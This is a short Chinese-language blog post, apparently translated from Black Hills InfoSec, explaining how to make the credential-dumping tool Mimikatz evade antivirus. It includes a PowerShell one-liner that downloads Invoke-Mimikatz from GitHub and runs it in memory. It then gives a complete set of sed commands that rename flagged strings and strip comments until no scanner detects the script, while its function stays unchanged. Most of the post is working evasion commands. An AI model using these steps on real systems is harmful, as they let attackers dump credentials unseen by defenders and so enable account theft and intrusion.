如何繞過殺軟執行 Mimikatz？

曾幾何時，你是否也像我一樣希望執行 Mimikatz 的時候不會被殺毒軟體查殺。但現實卻是，當我從 PowerSploit 上下載 PowerShell 腳本 "Invoke-Mimikatz" 後，無論是否將腳本存儲到硬碟當中都會立馬被 Windows Defender 標記為了惡意軟體。

powershell "IEX (New-Object Net.WebClient).DownloadString(https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1);Invoke-Mimikatz"

隨後將 "Invoke-Mimikatz" 腳本上傳到 VirusTotal，我們會發現共有 19 個殺毒軟體會將其標記為惡意軟體。

但是呢，我們也知道殺毒軟體的檢測通常都只是簡單基於查找文件中的敏感辭彙，所以在修改部分敏感辭彙後就可以繞過一些殺毒軟體了，例如將文件名替換為 "Invoke-Mimidogz" 後，就只有 8 個殺毒軟體會在檢測到。

sed -i -e s/Invoke-Mimikatz/Invoke-Mimidogz/g Invoke-Mimikatz.ps1

在讓我們把腳本中的無用的內容都去除看看效果呢？

sed -i -e /<#/,/#>/c\ Invoke-Mimikatz.ps1sed -i -e s/^[[:space:]]*#.*$//g Invoke-Mimikatz.ps1

一下就只剩 4 個殺毒軟體還會在報了。那麼讓我們繼續改進，好像殺毒軟體不太喜歡 "DumpCreds" 這個詞，那麼改成 "DumpCred" 怎麼樣呢？

sed -i -e s/DumpCreds/DumpCred/g Invoke-Mimikatz.ps1

現在就只剩 2 個殺軟了，通常來說我一般就會到此結束了，畢竟已經有大量可用的了，誰還在乎那剩下的兩個殺軟呢。但是此時我女兒問我「為什麼不能進一步繞過所有的殺軟呢？」。好吧，那就讓我們繼續吧，僅需要在增加三行即可完成，下面把所需的完整代碼一次全部貼出來：

sed -i -e s/Invoke-Mimikatz/Invoke-Mimidogz/g Invoke-Mimikatz.ps1sed -i -e /<#/,/#>/c\ Invoke-Mimikatz.ps1sed -i -e s/^[[:space:]]*#.*$//g Invoke-Mimikatz.ps1sed -i -e s/DumpCreds/DumpCred/g Invoke-Mimikatz.ps1sed -i -e s/ArgumentPtr/NotTodayPal/g Invoke-Mimikatz.ps1sed -i -e s/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g Invoke-Mimikatz.ps1sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions #-/g" Invoke-Mimikatz.ps1

至此，我們在沒有修改任何功能的情況下，僅通過簡單修改 Mimikatz 腳本就繞過了所有殺軟的查殺。所以，你還在迷信殺毒軟體的保護嗎？

註：本文參考來源於blackhillsinfosec

推薦閱讀：